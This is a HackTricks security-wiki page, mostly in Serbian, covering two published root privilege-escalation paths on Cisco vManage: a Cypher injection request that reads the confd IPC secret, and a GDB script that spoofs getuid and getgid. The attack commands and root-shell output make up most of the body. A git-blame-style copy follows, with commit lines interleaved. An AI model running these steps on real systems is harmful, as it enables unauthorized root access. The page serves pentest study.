hacktricks/linux-hardening/privilege-escalation/cisco-vmanage.md

# Cisco - vmanage

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Path 1

(Primer sa [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html))

Nakon što smo malo istražili neku [dokumentaciju](http://66.218.245.39/doc/html/rn03re18.html) vezanu za `confd` i različite binarne datoteke (pristupačne sa nalogom na Cisco veb sajtu), otkrili smo da za autentifikaciju IPC soketa koristi tajnu smeštenu u `/etc/confd/confd_ipc_secret`:
```
vmanage:~$ ls -al /etc/confd/confd_ipc_secret

-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
```
Zapamtite našu Neo4j instancu? Ona radi pod privilegijama korisnika `vmanage`, što nam omogućava da preuzmemo datoteku koristeći prethodnu ranjivost:
```
GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1

Host: vmanage-XXXXXX.viptela.net


[...]

"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
```
Program `confd_cli` ne podržava argumente komandne linije, već poziva `/usr/bin/confd_cli_user` sa argumentima. Dakle, mogli bismo direktno pozvati `/usr/bin/confd_cli_user` sa našim skupom argumenata. Međutim, nije čitljiv sa našim trenutnim privilegijama, pa moramo da ga preuzmemo iz rootfs i kopiramo ga koristeći scp, pročitamo pomoć i koristimo ga da dobijemo shell:
```
vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret

vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret

vManage:~$ /tmp/confd_cli_user -U 0 -G 0

Welcome to Viptela CLI

admin connected from 127.0.0.1 using console on vManage

vManage# vshell

vManage:~# id

uid=0(root) gid=0(root) groups=0(root)
```
## Path 2

(Primer sa [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77))

Blog¹ tima synacktiv opisao je elegantan način da se dobije root shell, ali upozorenje je da je potrebno dobiti kopiju `/usr/bin/confd_cli_user` koja je samo čitljiva od strane root-a. Pronašao sam drugi način da se eskaliram na root bez takvih problema.

Kada sam dekompajlirao `/usr/bin/confd_cli` binarni fajl, primetio sam sledeće:
```
vmanage:~$ objdump -d /usr/bin/confd_cli
… snipped …
40165c: 48 89 c3              mov    %rax,%rbx
40165f: bf 1c 31 40 00        mov    $0x40311c,%edi
401664: e8 17 f8 ff ff        callq  400e80 <getenv@plt>
401669: 49 89 c4              mov    %rax,%r12
40166c: 48 85 db              test   %rbx,%rbx
40166f: b8 dc 30 40 00        mov    $0x4030dc,%eax
401674: 48 0f 44 d8           cmove  %rax,%rbx
401678: 4d 85 e4              test   %r12,%r12
40167b: b8 e6 30 40 00        mov    $0x4030e6,%eax
401680: 4c 0f 44 e0           cmove  %rax,%r12
401684: e8 b7 f8 ff ff        callq  400f40 <getuid@plt>  <-- HERE
401689: 89 85 50 e8 ff ff     mov    %eax,-0x17b0(%rbp)
40168f: e8 6c f9 ff ff        callq  401000 <getgid@plt>  <-- HERE
401694: 89 85 44 e8 ff ff     mov    %eax,-0x17bc(%rbp)
40169a: 8b bd 68 e8 ff ff     mov    -0x1798(%rbp),%edi
4016a0: e8 7b f9 ff ff        callq  401020 <ttyname@plt>
4016a5: c6 85 cf f7 ff ff 00  movb   $0x0,-0x831(%rbp)
4016ac: 48 85 c0              test   %rax,%rax
4016af: 0f 84 ad 03 00 00     je     401a62 <socket@plt+0x952>
4016b5: ba ff 03 00 00        mov    $0x3ff,%edx
4016ba: 48 89 c6              mov    %rax,%rsi
4016bd: 48 8d bd d0 f3 ff ff  lea    -0xc30(%rbp),%rdi
4016c4:   e8 d7 f7 ff ff           callq  400ea0 <*ABS*+0x32e9880f0b@plt>
… snipped …
```
Kada pokrenem “ps aux”, primetio sam sledeće (_napomena -g 100 -u 107_)
```
vmanage:~$ ps aux
… snipped …
root     28644  0.0  0.0   8364   652 ?        Ss   18:06   0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash
… snipped …
```
I hypothesized the “confd\_cli” program passes the user ID and group ID it collected from the logged in user to the “cmdptywrapper” application.

My first attempt was to run the “cmdptywrapper” directly and supplying it with `-g 0 -u 0`, but it failed. It appears a file descriptor (-i 1015) was created somewhere along the way and I cannot fake it.

As mentioned in synacktiv’s blog(last example), the `confd_cli` program does not support command line argument, but I can influence it with a debugger and fortunately GDB is included on the system.

I created a GDB script where I forced the API `getuid` and `getgid` to return 0. Since I already have “vmanage” privilege through the deserialization RCE, I have permission to read the `/etc/confd/confd_ipc_secret` directly.

root.gdb:
```
set environment USER=root
define root
finish
set $rax=0
continue
end
break getuid
commands
root
end
break getgid
commands
root
end
run
```
Izlaz konzole:
```
vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-poky-linux".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.
Breakpoint 1 at 0x400f40
Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401871 in ?? ()
Welcome to Viptela CLI
root connected from 127.0.0.1 using console on vmanage
vmanage# vshell
bash-4.4# whoami ; id
root
uid=0(root) gid=0(root) groups=0(root)
bash-4.4#
```
{% hint style="success" %}
Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Podržite HackTricks</summary>

* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>
{% endhint %}
-												GitBook: [#3668] No subject

											
										
										
											2022-12-03 17:35:56 +00:00
+								# Cisco - vmanage
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								{% hint style="success" %}
 								Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								<summary>Support HackTricks</summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
 								* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								{% endhint %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								## Path 1
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								(Primer sa [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html))
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								Nakon što smo malo istražili neku [dokumentaciju](http://66.218.245.39/doc/html/rn03re18.html) vezanu za `confd` i različite binarne datoteke (pristupačne sa nalogom na Cisco veb sajtu), otkrili smo da za autentifikaciju IPC soketa koristi tajnu smeštenu u `/etc/confd/confd_ipc_secret`:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								vmanage:~$ ls -al /etc/confd/confd_ipc_secret
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
 								-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								Zapamtite našu Neo4j instancu? Ona radi pod privilegijama korisnika `vmanage`, što nam omogućava da preuzmemo datoteku koristeći prethodnu ranjivost:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
+								GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								Host: vmanage-XXXXXX.viptela.net
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
 								[...]
 								"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								Program `confd_cli` ne podržava argumente komandne linije, već poziva `/usr/bin/confd_cli_user` sa argumentima. Dakle, mogli bismo direktno pozvati `/usr/bin/confd_cli_user` sa našim skupom argumenata. Međutim, nije čitljiv sa našim trenutnim privilegijama, pa moramo da ga preuzmemo iz rootfs i kopiramo ga koristeći scp, pročitamo pomoć i koristimo ga da dobijemo shell:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
+								vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
 								vManage:~$ /tmp/confd_cli_user -U 0 -G 0
 								Welcome to Viptela CLI
 								admin connected from 127.0.0.1 using console on vManage
 								vManage# vshell
 								vManage:~# id
 								uid=0(root) gid=0(root) groups=0(root)
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								## Path 2
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								(Primer sa [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77))
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								Blog¹ tima synacktiv opisao je elegantan način da se dobije root shell, ali upozorenje je da je potrebno dobiti kopiju `/usr/bin/confd_cli_user` koja je samo čitljiva od strane root-a. Pronašao sam drugi način da se eskaliram na root bez takvih problema.
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								Kada sam dekompajlirao `/usr/bin/confd_cli` binarni fajl, primetio sam sledeće:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
+								vmanage:~$ objdump -d /usr/bin/confd_cli
 								… snipped …
 c: 48 89 c3              mov    %rax,%rbx
 f: bf 1c 31 40 00        mov    $0x40311c,%edi
 : e8 17 f8 ff ff        callq  400e80 <getenv@plt>
 : 49 89 c4              mov    %rax,%r12
 c: 48 85 db              test   %rbx,%rbx
 f: b8 dc 30 40 00        mov    $0x4030dc,%eax
 : 48 0f 44 d8           cmove  %rax,%rbx
 : 4d 85 e4              test   %r12,%r12
 b: b8 e6 30 40 00        mov    $0x4030e6,%eax
 : 4c 0f 44 e0           cmove  %rax,%r12
 : e8 b7 f8 ff ff        callq  400f40 <getuid@plt>  <-- HERE
 : 89 85 50 e8 ff ff     mov    %eax,-0x17b0(%rbp)
 f: e8 6c f9 ff ff        callq  401000 <getgid@plt>  <-- HERE
 : 89 85 44 e8 ff ff     mov    %eax,-0x17bc(%rbp)
 a: 8b bd 68 e8 ff ff     mov    -0x1798(%rbp),%edi
 a0: e8 7b f9 ff ff        callq  401020 <ttyname@plt>
 a5: c6 85 cf f7 ff ff 00  movb   $0x0,-0x831(%rbp)
 ac: 48 85 c0              test   %rax,%rax
 af: 0f 84 ad 03 00 00     je     401a62 <socket@plt+0x952>
 b5: ba ff 03 00 00        mov    $0x3ff,%edx
 ba: 48 89 c6              mov    %rax,%rsi
 bd: 48 8d bd d0 f3 ff ff  lea    -0xc30(%rbp),%rdi
 c4:   e8 d7 f7 ff ff           callq  400ea0 <*ABS*+0x32e9880f0b@plt>
 								… snipped …
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								Kada pokrenem “ps aux”, primetio sam sledeće (_napomena -g 100 -u 107_)
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								vmanage:~$ ps aux
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
+								… snipped …
 								root     28644  0.0  0.0   8364   652 ?        Ss   18:06   0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash
 								… snipped …
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								I hypothesized the “confd\_cli” program passes the user ID and group ID it collected from the logged in user to the “cmdptywrapper” application.
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								My first attempt was to run the “cmdptywrapper” directly and supplying it with `-g 0 -u 0`, but it failed. It appears a file descriptor (-i 1015) was created somewhere along the way and I cannot fake it.
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								As mentioned in synacktiv’s blog(last example), the `confd_cli` program does not support command line argument, but I can influence it with a debugger and fortunately GDB is included on the system.
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								I created a GDB script where I forced the API `getuid` and `getgid` to return 0. Since I already have “vmanage” privilege through the deserialization RCE, I have permission to read the `/etc/confd/confd_ipc_secret` directly.
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
 								root.gdb:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
+								set environment USER=root
 								define root
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								finish
 								set $rax=0
 								continue
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
+								end
 								break getuid
 								commands
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								root
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
+								end
 								break getgid
 								commands
-												Translated to Serbian

											
										
										
											2024-02-10 13:11:20 +00:00
+								root
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
+								end
 								run
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								Izlaz konzole:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-25 09:31:20 +00:00
+								vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
 								GNU gdb (GDB) 8.0.1
 								Copyright (C) 2017 Free Software Foundation, Inc.
 								License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
 								This is free software: you are free to change and redistribute it.
 								There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
 								and "show warranty" for details.
 								This GDB was configured as "x86_64-poky-linux".
 								Type "show configuration" for configuration details.
 								For bug reporting instructions, please see:
 								<http://www.gnu.org/software/gdb/bugs/>.
 								Find the GDB manual and other documentation resources online at:
 								<http://www.gnu.org/software/gdb/documentation/>.
 								For help, type "help".
 								Type "apropos word" to search for commands related to "word"...
 								Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.
 								Breakpoint 1 at 0x400f40
 								Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
 x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59
 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
 x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
 x0000000000401871 in ?? ()
 								Welcome to Viptela CLI
 								root connected from 127.0.0.1 using console on vmanage
 								vmanage# vshell
 								bash-4.4# whoami ; id
 								root
 								uid=0(root) gid=0(root) groups=0(root)
 								bash-4.4#
 								```
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								{% hint style="success" %}
 								Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								<summary>Podržite HackTricks</summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
 								* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie

											
										
										
											2024-07-19 04:51:32 +00:00
+								{% endhint %}